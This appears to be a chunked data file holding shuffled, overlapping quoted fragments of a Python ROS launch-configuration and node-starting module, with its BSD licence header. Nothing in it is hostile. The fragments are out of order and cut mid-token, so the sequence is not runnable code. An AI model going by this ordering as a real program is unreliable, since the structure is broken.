"self.rosservice_list_nodes) except: import traceback print(traceback.format_exc()) def getPath(self, path, package=''): ''' Searches for a",
"threading.RLock() # Load parameter self.launch_file = rospy.get_param('~launch_file', '') rospy.loginfo(\"launch_file: %s\" % self.launch_file) self.package",
"not None else '' args = ['__ns:=%s' % n.namespace, '__name:=%s' % n.name] if",
"self._timed_service_creation() # self.timer = rospy.Timer(rospy.Duration(2), self.timed_service_creation, True) # if self.nodes: # self.runService =",
"getPath(self, path, package=''): ''' Searches for a launch file. If package is given,",
"exclude list, skip autostart\", n.name) return # env = n.env_args prefix = n.launch_prefix",
"node. ''' self.runNode(req.node) return [] def rosservice_reload(self, req): self.load(2.) return [] # def",
"ANY DIRECT, INDIRECT, # INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, # BUT",
"'images': capabilies_descr[p.value]['images'], 'description': capabilies_descr[p.value]['description'], 'nodes': []} except: result[machine_name][ns][p.value] = {'type': '', 'images': [],",
"result = val.replace(\"\\\\n \", \"\\n\") try: result = result.decode(sys.getfilesystemencoding()) except: pass return result",
"1: cap_ns = roslib.names.namespace(cap_ns).rstrip(roslib.names.SEP) if not cap_ns: cap_ns = roslib.names.SEP cap_param = roslib.names.ns_join(cap_ns,",
"as xmlrpclib param_server = xmlrpclib.ServerProxy(masteruri) p = None try: # multi-call style xmlrpc",
"machine_name = item.machine_name if item.machine_name is not None and not item.machine_name == 'localhost'",
"# variables to print the pending autostart nodes self._pending_starts = set() self._pending_starts_last_printed =",
"# remove the 'BASH_ENV' and 'ENV' from environment new_env = dict(os.environ) try: for",
"OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER # CAUSED AND ON ANY THEORY OF",
"len(self._pending_starts), self._pending_starts) def _get_node(self, pkg, filename): cmd = None try: cmd = roslib.packages.find_node(pkg,",
"= xmlrpclib.MultiCall(param_server) for p in params.itervalues(): # suppressing this as it causes too",
"@raise StartException: if an error occurred while start. ''' if not self.parameter_loaded: self.loadParams()",
"rospy.loginfo(\"run node '%s as': %s\", node, str(' '.join(popen_cmd))) # remove the 'BASH_ENV' and",
"path depending on ROS distribution API. @return: ROS HOME path @rtype: C{str} '''",
"for ns, group_dict in ns_dict.items(): for group, descr_dict in group_dict.items(): if descr_dict['nodes']: cap",
"autostart=False): ''' Start the node with given name from the currently loaded configuration.",
"for param, value in self.roscfg.params.items(): params[param] = value # rospy.loginfo(\"register PARAMS:\\n%s\", '\\n'.join(params)) self._load_parameters(self.masteruri,",
"self.runService = None if self.listService is not None: self.listService.shutdown('reload config') self.listService = None",
"topic = '' try: topic = self.roscfg.params[param_name].value if rosgraph.names.is_private(topic): rospy.logwarn('Private for autostart required",
"import roslib.rosenv return roslib.rosenv.get_ros_home() else: import rospkg return rospkg.get_ros_home() except: import traceback print(traceback.format_exc())",
"sys.version_info[0] <= 2: import types string_types = types.StringTypes else: string_types = (str,) if",
"int(self.roscfg.params[respawn_min_runtime].value) except: pass try: result['delay'] = int(self.roscfg.params[respawn_delay].value) except: pass return result def get_ros_home(self):",
"if self.runService is None: self.runService = rospy.Service('~run', Task, self.rosservice_start_node) if self.listService is None:",
"stored in this configuration @rtype: C{dict(machine : dict(namespace: dict(group:dict('type' : str, 'description' :",
"rospy.loginfo(\"argv: %s\" % self.argv) if not isinstance(self.argv, list): self.argv = [\"%s\" % self.argv]",
"cap_ns: cap_ns = roslib.names.SEP # if the 'capability_group' parameter found, assign node to",
"found, take the first one launch_file = paths[0] if os.path.isfile(launch_file) and os.path.exists(launch_file): return",
"result[machine_name][ns] = dict() if p.value not in result[machine_name][ns]: try: result[machine_name][ns][p.value] = {'type': capabilies_descr[p.value]['type'],",
"delayed autostart parameter self._run_node(popen_cmd, cwd, new_env, rospy.names.ns_join(n.namespace, n.name), autostart) if len(cmd) > 1:",
"self._pending_starts_last_printed.clear() self._pending_starts_last_printed.update(self._pending_starts) rospy.loginfo(\"Pending autostarts %d: %s\", len(self._pending_starts), self._pending_starts) def _get_node(self, pkg, filename): cmd",
"False def _get_start_delay(self, node): param_name = rospy.names.ns_join(node, 'default_cfg/autostart/delay') try: return float(self.roscfg.params[param_name].value) except: pass",
"t.start() else: self._timed_service_creation() # self.timer = rospy.Timer(rospy.Duration(2), self.timed_service_creation, True) # if self.nodes: #",
"result def getCapabilitiesDesrc(self): ''' Parses the launch file for C{capabilities} and C{capability_group} parameter",
"and binary forms, with or without # modification, are permitted provided that the",
"name from the currently loaded configuration. @param node: the name of the node",
"for p in clear_params: param_server_multi.deleteParam(rospy.get_name(), p) r = param_server_multi() # for code, msg,",
"cpp plugins in rqt if n.namespace: new_env['ROS_NAMESPACE'] = n.namespace # set delayed autostart",
"'description'] -> ignore\", param) else: for entry in p.value: try: print(entry[0], rospy.get_param('/mastername', ''))",
"self.listService = None self.nodes = [] # the name of nodes with namespace",
"is None): args.append('__cwd:=%s' % n.cwd) # add remaps for remap in n.remap_args: args.append('%s:=%s'",
"format, expected: ['name', 'type', 'images', 'description'] -> ignore\", param) else: for entry in",
"self.roscfg.machines[n.machine_name] # TODO: env-loader support? # if machine.env_args: # env[len(env):] = machine.env_args #",
"to prevent error for p in clear_params: param_server_multi.deleteParam(rospy.get_name(), p) r = param_server_multi() #",
"working path, Default: the package of the node cwd = self.get_ros_home() if not",
"self.roscfg.machines: machine = self.roscfg.machines[machine].address if not machine or roslib.network.is_local_address(machine): for ns, group_dict in",
"return rosgraph.rosenv.get_master_uri() except: return roslib.rosenv.get_master_uri() def _timed_service_creation(self): with self.__lock: try: if self.runService is",
"@return: the capabilities description stored in this configuration @rtype: C{dict(machine : dict(namespace: dict(group:dict('type'",
"inform the caller about a new configuration. if self.runService is not None: self.runService.shutdown('reload",
"IN NO EVENT SHALL THE # COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR",
"rospy import shlex import std_srvs.srv import subprocess import sys import threading from .screen_handler",
"to update the view if delay_service_creation > 0.: t = threading.Timer(delay_service_creation, self._timed_service_creation) t.start()",
"'', 'images': [], 'description': '', 'nodes': []} result[machine_name][ns][p.value]['nodes'].append(node_fullname) return result def _masteruri_from_ros(self): '''",
"the launch file # ''' # try: # self.__lock.acquire() # self.load(req.package, req.file, req.argv)",
"self.get_ros_home() elif n.cwd == 'node': cwd = os.path.dirname(cmd[0]) respawn = [''] if n.respawn:",
"% self.launch_file) self.package = rospy.get_param('~package', '') rospy.loginfo(\"package: %s\" % self.package) self.do_autostart = rospy.get_param('~autostart',",
"the given package if package: paths = roslib.packages.find_resource(package, launch_file) if len(paths) > 0:",
"'' self.__lock = threading.RLock() # Load parameter self.launch_file = rospy.get_param('~launch_file', '') rospy.loginfo(\"launch_file: %s\"",
"error ''' result = val.replace(\"\\\\n \", \"\\n\") try: result = result.decode(sys.getfilesystemencoding()) except: pass",
"launch file with the same name found in the package, the first one",
"'min_runtime': 0, 'delay': 0} respawn_max = rospy.names.ns_join(node, 'respawn/max') respawn_min_runtime = rospy.names.ns_join(node, 'respawn/min_runtime') respawn_delay",
"IF ADVISED OF THE # POSSIBILITY OF SUCH DAMAGE. from __future__ import print_function",
"self.launch_file = rospy.get_param('~launch_file', '') rospy.loginfo(\"launch_file: %s\" % self.launch_file) self.package = rospy.get_param('~package', '') rospy.loginfo(\"package:",
"return bool(self.roscfg.params[param_name].value) except: pass return False def _get_start_delay(self, node): param_name = rospy.names.ns_join(node, 'default_cfg/autostart/delay')",
"if not (n.cwd is None): if n.cwd == 'ROS_HOME': cwd = self.get_ros_home() elif",
"file name of the launch file @type path: C{str} @param package: the package",
"start. ''' if not self.parameter_loaded: self.loadParams() n = None for item in self.roscfg.nodes:",
"the topic start_timer = threading.Timer(3., self._run_node, args=(cmd, cwd, env, node, autostart)) start_timer.start() if",
"def _run_node(self, cmd, cwd, env, node, autostart=False): self._pending_starts.add(node) start_now = True start_delay =",
"''' self.runNode(req.node) return [] def rosservice_reload(self, req): self.load(2.) return [] # def rosservice_load_launch(self,",
"= rospy.names.SEP rospy.set_param('~argv_used', list(set(argv))) loader.load(launch_path, self.roscfg, verbose=False, argv=argv) # create the list with",
"= threading.Timer(start_delay, self._run_node, args=(cmd, cwd, env, node, False)) start_timer.start() if start_now: ps =",
"as': %s\", node, str(' '.join(popen_cmd))) # remove the 'BASH_ENV' and 'ENV' from environment",
"and self.roscfg.params[cap_param].value: p = self.roscfg.params[cap_param] if machine_name not in result: result[machine_name] = dict()",
"IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS # \"AS IS\" AND ANY",
"'respawn') # set the respawn environment variables respawn_params = self._get_respawn_params(rospy.names.ns_join(n.namespace, n.name)) if respawn_params['max']",
"to inform the caller about a new configuration. ''' self.description_response = ListDescriptionResponse() #",
"one launch file with the same name found in the package, the first",
"and start_delay > 0: start_now = False # start timer for delayed start",
"False) rospy.loginfo(\"do_autostart: %s\" % self.do_autostart) self.load_params_at_start = rospy.get_param('~load_params_at_start', True) self.parameter_loaded = False rospy.loginfo(\"load_params_at_start:",
"getCapabilitiesDesrc(self): ''' Parses the launch file for C{capabilities} and C{capability_group} parameter and creates",
"_get_respawn_params(self, node): result = {'max': 0, 'min_runtime': 0, 'delay': 0} respawn_max = rospy.names.ns_join(node,",
"result['min_runtime'] = int(self.roscfg.params[respawn_min_runtime].value) except: pass try: result['delay'] = int(self.roscfg.params[respawn_delay].value) except: pass return result",
"inform the caller about a new configuration. ''' self.description_response = ListDescriptionResponse() # variables",
"# copyright notice, this list of conditions and the following # disclaimer in",
"%s\" % self.load_params_at_start) self.argv = rospy.get_param('~argv', []) rospy.loginfo(\"argv: %s\" % self.argv) if not",
"% node) if autostart and self._get_start_exclude(rospy.names.ns_join(n.namespace, n.name)): # skip autostart rospy.loginfo(\"%s is in",
"cmd is None or len(cmd) == 0: raise StartException('%s in package [%s] not",
"for the topic start_timer = threading.Timer(3., self._run_node, args=(cmd, cwd, env, node, autostart)) start_timer.start()",
"os.path.dirname(cmd[0]) respawn = [''] if n.respawn: respawn = self._get_node('node_manager_fkie', 'respawn') # set the",
"string entry from system default coding to unicode. @param val: the string coding",
"not (n.cwd is None): if n.cwd == 'ROS_HOME': cwd = self.get_ros_home() elif n.cwd",
"multiple nodes, invalid package raise StartException(str(e)) except Exception as e: raise StartException(str(e)) #",
"group if not cap_ns: cap_ns = roslib.names.SEP # if the 'capability_group' parameter found,",
"@rtype: C{unicode} or original on error ''' result = val.replace(\"\\\\n \", \"\\n\") try:",
"print 'runNode: ', cmd_args popen_cmd = shlex.split(str(' '.join(cmd_args))) rospy.loginfo(\"run node '%s as': %s\",",
"and cap_param.count(roslib.names.SEP) > 1: cap_ns = roslib.names.namespace(cap_ns).rstrip(roslib.names.SEP) if not cap_ns: cap_ns = roslib.names.SEP",
"''.join([entry[1]]), 'images': entry[2].split(','), 'description': self._decode(entry[3])} # get the capability nodes for item in",
"roslib.rosenv return roslib.rosenv.get_ros_home() @classmethod def _load_parameters(cls, masteruri, params, clear_params): \"\"\" Load parameters onto",
"self.roscfg.params.items(): if param.endswith('robots'): if isinstance(p.value, list): if len(p.value) > 0 and len(p.value[0]) !=",
"= self._get_node(n.package, n.type) # determine the current working path, Default: the package of",
"param_server_multi() # for code, msg, _ in r: # if code != 1:",
"if the C{file} is an absolute path @type package: C{str} @return: the absolute",
"self.roscfg.params and self.roscfg.params[cap_param].value: p = self.roscfg.params[cap_param] if machine_name not in result: result[machine_name] =",
"and not n.machine_name == 'localhost': # machine = self.roscfg.machines[n.machine_name] # TODO: env-loader support?",
"== topic: start_now = True break if not start_now: # Start the timer",
"Agreement (BSD License) # # Copyright (c) 2012, Fraunhofer FKIE/US, <NAME> # All",
"value # rospy.loginfo(\"register PARAMS:\\n%s\", '\\n'.join(params)) self._load_parameters(self.masteruri, params, self.roscfg.clear_params) self.parameter_loaded = True def runNode(self,",
"'''@ivar: The service will be created on each load of a launch file",
"invalid package raise StartException(str(e)) except Exception as e: raise StartException(str(e)) # handle different",
"cwd, env, node, autostart)) start_timer.start() if start_now and autostart and start_delay > 0:",
"req): ''' Callback for the ROS service to start a node. ''' self.runNode(req.node)",
"OTHERWISE) ARISING IN # ANY WAY OUT OF THE USE OF THIS SOFTWARE,",
"2: import types string_types = types.StringTypes else: string_types = (str,) if isinstance(cmd, string_types):",
"a launch file to inform the caller about a new configuration. ''' self.description_response",
"cap_ns = node_fullname # find the capability group parameter in namespace while cap_param",
"rospy.loginfo(\"loading launch file: %s\", launch_path) self.masteruri = self._masteruri_from_ros() self.roscfg = ROSLaunchConfig() loader =",
": [(sensor type, sensor name, sensor description), ...])}''' self.robot_descr = ('', '', '')",
"= '' self.__lock = threading.RLock() # Load parameter self.launch_file = rospy.get_param('~launch_file', '') rospy.loginfo(\"launch_file:",
"OF SUCH DAMAGE. from __future__ import print_function from multimaster_msgs_fkie.msg import Capability from multimaster_msgs_fkie.srv",
"C{str} @raise LoadException: if the given file is not found ''' launch_file =",
"''): dr.robot_name = self._decode(entry[2]) dr.robot_type = entry[1] dr.robot_images = entry[3].split(',') dr.robot_descr = self._decode(entry[4])",
"'diamondback', 'cturtle']: import roslib.rosenv return roslib.rosenv.get_ros_home() else: import rospkg return rospkg.get_ros_home() except: import",
"the current description. ''' return self.description_response def loadParams(self): ''' Loads all parameter into",
"respawn_params['max'])) if respawn_params['min_runtime'] > 0: n.env_args.append(('RESPAWN_MIN_RUNTIME', '%d' % respawn_params['min_runtime'])) if respawn_params['delay'] > 0:",
"met: # # * Redistributions of source code must retain the above copyright",
"rospy.loginfo(\"register PARAMS:\\n%s\", '\\n'.join(params)) self._load_parameters(self.masteruri, params, self.roscfg.clear_params) self.parameter_loaded = True def runNode(self, node, autostart=False):",
"name : [(sensor type, sensor name, sensor description), ...])}''' self.robot_descr = ('', '',",
"if not machine or roslib.network.is_local_address(machine): for ns, group_dict in ns_dict.items(): for group, descr_dict",
"except: # import traceback # print traceback.format_exc() if self.do_autostart: if not self.parameter_loaded: self.loadParams()",
"the launch file or an empty string, if the C{file} is an absolute",
"rospy.names.ns_join(node, 'respawn/min_runtime') respawn_delay = rospy.names.ns_join(node, 'respawn/delay') try: result['max'] = int(self.roscfg.params[respawn_max].value) except: pass try:",
"# multiple nodes, invalid package raise StartException(str(e)) except Exception as e: raise StartException(str(e))",
"launch file: %s\", launch_path) self.masteruri = self._masteruri_from_ros() self.roscfg = ROSLaunchConfig() loader = XmlLoader()",
"package)) def rosservice_list_nodes(self, req): ''' Callback for the ROS service to get the",
"master Name)', 'type', 'name', 'images', 'description'] -> ignore\", param) else: for entry in",
"self.__lock: try: if self.runService is None: self.runService = rospy.Service('~run', Task, self.rosservice_start_node) if self.listService",
"the nodes. @return: the capabilities description stored in this configuration @rtype: C{dict(machine :",
"except roslib.packages.ROSPkgException as e: # multiple nodes, invalid package raise StartException(str(e)) except Exception",
"''' Returns the ROS HOME path depending on ROS distribution API. @return: ROS",
"FKIE/US, <NAME> # All rights reserved. # # Redistribution and use in source",
"ns not in result[machine_name]: result[machine_name][ns] = dict() if p.value not in result[machine_name][ns]: try:",
"list with node names for item in self.roscfg.nodes: if item.machine_name and not item.machine_name",
"Name)', 'type', 'name', 'images', 'description'] -> ignore\", param) else: for entry in p.value:",
"the launch file for C{capabilities} and C{capability_group} parameter and creates dictionary for grouping",
"capabilies_descr = dict() if self.roscfg is not None: # get the capabilities description",
"environment new_env = dict(os.environ) try: for k in ['BASH_ENV', 'ENV']: del new_env[k] except:",
"# * Neither the name of Fraunhofer nor the names of its #",
"% respawn_params['delay'])) node_cmd = [respawn[0], prefix, cmd[0]] cmd_args = [ScreenHandler.getSceenCmd(node)] cmd_args[len(cmd_args):] = node_cmd",
"SUBSTITUTE GOODS OR SERVICES; # LOSS OF USE, DATA, OR PROFITS; OR BUSINESS",
"roslib.packages.ROSPkgException as e: # multiple nodes, invalid package raise StartException(str(e)) except Exception as",
"BUT NOT # LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS #",
"dr.capabilities.append(cap) # load parameters into the ROS parameter server if self.load_params_at_start: self.loadParams() #",
"%s\" % self.do_autostart) self.load_params_at_start = rospy.get_param('~load_params_at_start', True) self.parameter_loaded = False rospy.loginfo(\"load_params_at_start: %s\" %",
"used in cpp plugins in rqt if n.namespace: new_env['ROS_NAMESPACE'] = n.namespace # set",
"# start timer for delayed start start_timer = threading.Timer(start_delay, self._run_node, args=(cmd, cwd, env,",
"and decode the string entry from system default coding to unicode. @param val:",
"threading.Timer(delay_service_creation, self._timed_service_creation) t.start() else: self._timed_service_creation() # self.timer = rospy.Timer(rospy.Duration(2), self.timed_service_creation, True) # if",
"descr_dict['type'] cap.images = list(descr_dict['images']) cap.description = descr_dict['description'] cap.nodes = list(descr_dict['nodes']) dr.capabilities.append(cap) # load",
"''' Replaces the '\\\\n' by LF (Line Feed) and decode the string entry",
"of the node cwd = self.get_ros_home() if not (n.cwd is None): if n.cwd",
"'' elif not rosgraph.names.is_global(topic): topic = rospy.names.ns_join(rosgraph.names.namespace(node), topic) except: pass return topic def",
"argv=argv) # create the list with node names for item in self.roscfg.nodes: if",
"itemname == node: n = item break if n is None: raise StartException(\"Node",
"empty namespace os.environ[ROS_NAMESPACE] = rospy.names.SEP rospy.set_param('~argv_used', list(set(argv))) loader.load(launch_path, self.roscfg, verbose=False, argv=argv) # create",
"break if not start_now: # Start the timer for waiting for the topic",
"caller about a new configuration. ''' self.listService = None '''@ivar: The service will",
"reserved. # # Redistribution and use in source and binary forms, with or",
"== 'ROS_HOME': cwd = self.get_ros_home() elif n.cwd == 'node': cwd = os.path.dirname(cmd[0]) respawn",
"Copyright (c) 2012, Fraunhofer FKIE/US, <NAME> # All rights reserved. # # Redistribution",
"if the given file is not found ''' launch_file = path # if",
"binary form must reproduce the above # copyright notice, this list of conditions",
"respawn_max = rospy.names.ns_join(node, 'respawn/max') respawn_min_runtime = rospy.names.ns_join(node, 'respawn/min_runtime') respawn_delay = rospy.names.ns_join(node, 'respawn/delay') try:",
"= rospy.names.ns_join(node, 'respawn/min_runtime') respawn_delay = rospy.names.ns_join(node, 'respawn/delay') try: result['max'] = int(self.roscfg.params[respawn_max].value) except: pass",
"set the respawn environment variables respawn_params = self._get_respawn_params(rospy.names.ns_join(n.namespace, n.name)) if respawn_params['max'] > 0:",
"printlog(\"setting parameter [%s]\"%p.key) param_server_multi.setParam(rospy.get_name(), p.key, p.value) r = param_server_multi() for code, msg, _",
"\"\\n\") try: result = result.decode(sys.getfilesystemencoding()) except: pass return result def getCapabilitiesDesrc(self): ''' Parses",
"in the given package. If more then one launch file with the same",
"parameter self.launch_file = rospy.get_param('~launch_file', '') rospy.loginfo(\"launch_file: %s\" % self.launch_file) self.package = rospy.get_param('~package', '')",
"without # modification, are permitted provided that the following conditions # are met:",
"# if self.nodes: # self.runService = rospy.Service('~run', Task, self.rosservice_start_node) # self.listServic = rospy.Service('~list_nodes',",
"= True break if ':=' not in a or in_filter: continue result.append(a) return",
"= item break if n is None: raise StartException(\"Node '%s' not found!\" %",
"'localhost': # machine = self.roscfg.machines[n.machine_name] # TODO: env-loader support? # if machine.env_args: #",
"configuration. ''' self.description_response = ListDescriptionResponse() # variables to print the pending autostart nodes",
"= rospy.Service('~list_nodes', ListNodes, self.rosservice_list_nodes) except: import traceback print(traceback.format_exc()) def getPath(self, path, package=''): '''",
"launch file configuration ''' with self.__lock: self._pending_starts.clear() # shutdown the services to inform",
"def rosservice_start_node(self, req): ''' Callback for the ROS service to start a node.",
"self._timed_service_creation) t.start() else: self._timed_service_creation() # self.timer = rospy.Timer(rospy.Duration(2), self.timed_service_creation, True) # if self.nodes:",
"is found, take the first one launch_file = paths[0] if os.path.isfile(launch_file) and os.path.exists(launch_file):",
"':=' not in a or in_filter: continue result.append(a) return result def load(self, delay_service_creation=0.):",
"launch_path = self.getPath(self.launch_file, self.package) rospy.loginfo(\"loading launch file: %s\", launch_path) self.masteruri = self._masteruri_from_ros() self.roscfg",
"from this software without specific prior written permission. # # THIS SOFTWARE IS",
"# notice, this list of conditions and the following disclaimer. # * Redistributions",
"package: the package containing the launch file or an empty string, if the",
"ROS HOME path depending on ROS distribution API. @return: ROS HOME path @rtype:",
"the node @type node: C{str} @raise StartException: if an error occurred while start.",
"machine = self.roscfg.machines[item.machine_name] if roslib.network.is_local_address(machine.address): self.nodes.append(roslib.names.ns_join(item.namespace, item.name)) else: self.nodes.append(roslib.names.ns_join(item.namespace, item.name)) # get the",
"to avoid load the launchfile info local namespace sys.argv = list(argv) # set",
"DAMAGE. from __future__ import print_function from multimaster_msgs_fkie.msg import Capability from multimaster_msgs_fkie.srv import ListDescription,",
"the decoded string @rtype: C{unicode} or original on error ''' result = val.replace(\"\\\\n",
"'' self.file = '' self.__lock = threading.RLock() # Load parameter self.launch_file = rospy.get_param('~launch_file',",
"# add new group in the namespace of the node if ns not",
"autostart required topic `%s` is ignored!' % topic) topic = '' elif not",
"found!' % (filename, pkg)) return cmd def _get_start_exclude(self, node): param_name = rospy.names.ns_join(node, 'default_cfg/autostart/exclude')",
"(type, name, text) ''' self.package = '' self.file = '' self.__lock = threading.RLock()",
"string_types = (str,) if isinstance(cmd, string_types): cmd = [cmd] if cmd is None",
"INCLUDING, BUT NOT # LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS",
"Task, ListDescriptionResponse, ListNodesResponse # , LoadLaunch from rosgraph.rosenv import ROS_NAMESPACE from roslaunch import",
"param, p in self.roscfg.params.items(): if param.endswith('robots'): if isinstance(p.value, list): if len(p.value) > 0",
"'images', 'description'] -> ignore\", param) else: for entry in p.value: try: print(entry[0], rospy.get_param('/mastername',",
"rospy.loginfo(\"load_params_at_start: %s\" % self.load_params_at_start) self.argv = rospy.get_param('~argv', []) rospy.loginfo(\"argv: %s\" % self.argv) if",
"each load of a launch file to inform the caller about a new",
"self.package = '' self.file = '' self.__lock = threading.RLock() # Load parameter self.launch_file",
"variables to print the pending autostart nodes self._pending_starts = set() self._pending_starts_last_printed = set()",
"import traceback print(traceback.format_exc()) import roslib.rosenv return roslib.rosenv.get_ros_home() @classmethod def _load_parameters(cls, masteruri, params, clear_params):",
"= False # start timer for delayed start start_timer = threading.Timer(start_delay, self._run_node, args=(cmd,",
"= rospy.names.ns_join(node, 'default_cfg/autostart/exclude') try: return bool(self.roscfg.params[param_name].value) except: pass return False def _get_start_delay(self, node):",
"of (type, name, text) ''' self.package = '' self.file = '' self.__lock =",
"style xmlrpc param_server_multi = xmlrpclib.MultiCall(param_server) # clear specified parameter namespaces # #2468 unify",
"afilter: if a.startswith(f): in_filter = True break if ':=' not in a or",
"cap_param = roslib.names.ns_join(node_fullname, 'capability_group') cap_ns = node_fullname # find the capability group parameter",
"written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND",
"topic = rospy.names.ns_join(rosgraph.names.namespace(node), topic) except: pass return topic def _get_respawn_params(self, node): result =",
"THE # COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, #",
"sensor description tmp_cap_dict = self.getCapabilitiesDesrc() for machine, ns_dict in tmp_cap_dict.items(): if machine in",
"an error occurred while start. ''' if not self.parameter_loaded: self.loadParams() n = None",
"cwd, env, node, autostart=False): self._pending_starts.add(node) start_now = True start_delay = self._get_start_delay(node) start_required =",
"[\"%s\" % self.argv] sys.argv.extend(self.argv) if self.do_autostart: rospy.set_param('~autostart', False) # initialize the ROS services",
"if n.machine_name and not n.machine_name == 'localhost': # machine = self.roscfg.machines[n.machine_name] # TODO:",
"True break if not start_now: # Start the timer for waiting for the",
"'%s' not found!\" % node) if autostart and self._get_start_exclude(rospy.names.ns_join(n.namespace, n.name)): # skip autostart",
"dr.robot_descr = self._decode(entry[4]) break except: pass # get the sensor description tmp_cap_dict =",
"first one was started! Exceutables:\\n%s' % str(cmd)) def _run_node(self, cmd, cwd, env, node,",
"launch_file) if len(paths) > 0: # if more then one launch file is",
"* Neither the name of Fraunhofer nor the names of its # contributors",
"== 'node': cwd = os.path.dirname(cmd[0]) respawn = [''] if n.respawn: respawn = self._get_node('node_manager_fkie',",
"clear params to prevent error for p in clear_params: param_server_multi.deleteParam(rospy.get_name(), p) r =",
"group parameter found, assign node to the group if not cap_ns: cap_ns =",
"n is None: raise StartException(\"Node '%s' not found!\" % node) if autostart and",
"subprocess.Popen(cmd, cwd=cwd, env=env) # wait for process to avoid 'defunct' processes thread =",
"pass return topic def _get_respawn_params(self, node): result = {'max': 0, 'min_runtime': 0, 'delay':",
"software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY",
"rospkg.distro distro = rospkg.distro.current_distro_codename() if distro in ['electric', 'diamondback', 'cturtle']: return roslib.rosenv.get_master_uri() else:",
"is used in cpp plugins in rqt if n.namespace: new_env['ROS_NAMESPACE'] = n.namespace #",
"0: n.env_args.append(('RESPAWN_DELAY', '%d' % respawn_params['delay'])) node_cmd = [respawn[0], prefix, cmd[0]] cmd_args = [ScreenHandler.getSceenCmd(node)]",
"parameter in namespace while cap_param not in self.roscfg.params and cap_param.count(roslib.names.SEP) > 1: cap_ns",
"# except: # import traceback # print traceback.format_exc() if self.do_autostart: if not self.parameter_loaded:",
"from system default coding to unicode. @param val: the string coding as system",
"in self.roscfg.machines: machine = self.roscfg.machines[machine].address if not machine or roslib.network.is_local_address(machine): for ns, group_dict",
"THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT # LIABILITY, OR TORT (INCLUDING NEGLIGENCE",
"rospy.get_param('/mastername', ''): dr.robot_name = self._decode(entry[2]) dr.robot_type = entry[1] dr.robot_images = entry[3].split(',') dr.robot_descr =",
"param_server_multi.deleteParam(rospy.get_name(), p) r = param_server_multi() # for code, msg, _ in r: #",
"list, skip autostart\", n.name) return # env = n.env_args prefix = n.launch_prefix if",
"multi-call objects are not reusable param_server_multi = xmlrpclib.MultiCall(param_server) for p in params.itervalues(): #",
"in namespace while cap_param not in self.roscfg.params and cap_param.count(roslib.names.SEP) > 1: cap_ns =",
"in r: # if code != 1: # raise StartException(\"Failed to clear parameter:",
"import xmlrpclib except ImportError: import xmlrpc.client as xmlrpclib param_server = xmlrpclib.ServerProxy(masteruri) p =",
"from multimaster_msgs_fkie.msg import Capability from multimaster_msgs_fkie.srv import ListDescription, ListNodes, Task, ListDescriptionResponse, ListNodesResponse #",
"self.nodes = [] # the name of nodes with namespace self.sensors = {}",
"environment to empty namespace os.environ[ROS_NAMESPACE] = rospy.names.SEP rospy.set_param('~argv_used', list(set(argv))) loader.load(launch_path, self.roscfg, verbose=False, argv=argv)",
"if start_required == topic: start_now = True break if not start_now: # Start",
"rospy.logwarn(\"Error while start %s: %s\", n, e) self.do_autostart = False def _decode(self, val):",
"n.env_args.append(('RESPAWN_MIN_RUNTIME', '%d' % respawn_params['min_runtime'])) if respawn_params['delay'] > 0: n.env_args.append(('RESPAWN_DELAY', '%d' % respawn_params['delay'])) node_cmd",
"= ['__ns:=', '__name:=', '_package:=', '_launch_file:='] result = [] for a in argv: in_filter",
"[] for a in argv: in_filter = False for f in afilter: if",
"= list(descr_dict['nodes']) dr.capabilities.append(cap) # load parameters into the ROS parameter server if self.load_params_at_start:",
"for code, msg, _ in r: # if code != 1: # raise",
"# rospy.loginfo(\"register PARAMS:\\n%s\", '\\n'.join(params)) self._load_parameters(self.masteruri, params, self.roscfg.clear_params) self.parameter_loaded = True def runNode(self, node,",
"2012, Fraunhofer FKIE/US, <NAME> # All rights reserved. # # Redistribution and use",
"self._get_start_exclude(rospy.names.ns_join(n.namespace, n.name)): # skip autostart rospy.loginfo(\"%s is in exclude list, skip autostart\", n.name)",
"n.name] if not (n.cwd is None): args.append('__cwd:=%s' % n.cwd) # add remaps for",
"package if package: paths = roslib.packages.find_resource(package, launch_file) if len(paths) > 0: # if",
"the respawn environment variables respawn_params = self._get_respawn_params(rospy.names.ns_join(n.namespace, n.name)) if respawn_params['max'] > 0: n.env_args.append(('RESPAWN_MAX',",
"xmlrpclib param_server = xmlrpclib.ServerProxy(masteruri) p = None try: # multi-call style xmlrpc param_server_multi",
"self.roscfg = ROSLaunchConfig() loader = XmlLoader() argv = self._filter_args(sys.argv) # remove namespace from",
"description. ''' return self.description_response def loadParams(self): ''' Loads all parameter into ROS parameter",
": [str]))))} ''' result = dict() capabilies_descr = dict() if self.roscfg is not",
"group, descr_dict in group_dict.items(): if descr_dict['nodes']: cap = Capability() cap.namespace = ns cap.name",
"occurred while start. ''' if not self.parameter_loaded: self.loadParams() n = None for item",
"roslib.packages.find_node(pkg, filename) except roslib.packages.ROSPkgException as e: # multiple nodes, invalid package raise StartException(str(e))",
"_ in r: if code != 1: raise StartException(\"Failed to set parameter: %s\"",
"to get the list with available nodes. ''' return ListNodesResponse(self.nodes) def rosservice_start_node(self, req):",
"default coding to unicode. @param val: the string coding as system default @type",
"get the capability nodes for item in self.roscfg.nodes: node_fullname = roslib.names.ns_join(item.namespace, item.name) machine_name",
"params[param] = value # rospy.loginfo(\"register PARAMS:\\n%s\", '\\n'.join(params)) self._load_parameters(self.masteruri, params, self.roscfg.clear_params) self.parameter_loaded = True",
"self.roscfg.params[param_name].value if rosgraph.names.is_private(topic): rospy.logwarn('Private for autostart required topic `%s` is ignored!' % topic)",
"file or an empty string, if the C{file} is an absolute path @type",
"'%d' % respawn_params['max'])) if respawn_params['min_runtime'] > 0: n.env_args.append(('RESPAWN_MIN_RUNTIME', '%d' % respawn_params['min_runtime'])) if respawn_params['delay']",
"create the list with node names for item in self.roscfg.nodes: if item.machine_name and",
"roslib.names.ns_join(cap_ns, 'capability_group') if cap_ns == node_fullname: cap_ns = item.namespace.rstrip(roslib.names.SEP) # if the parameter",
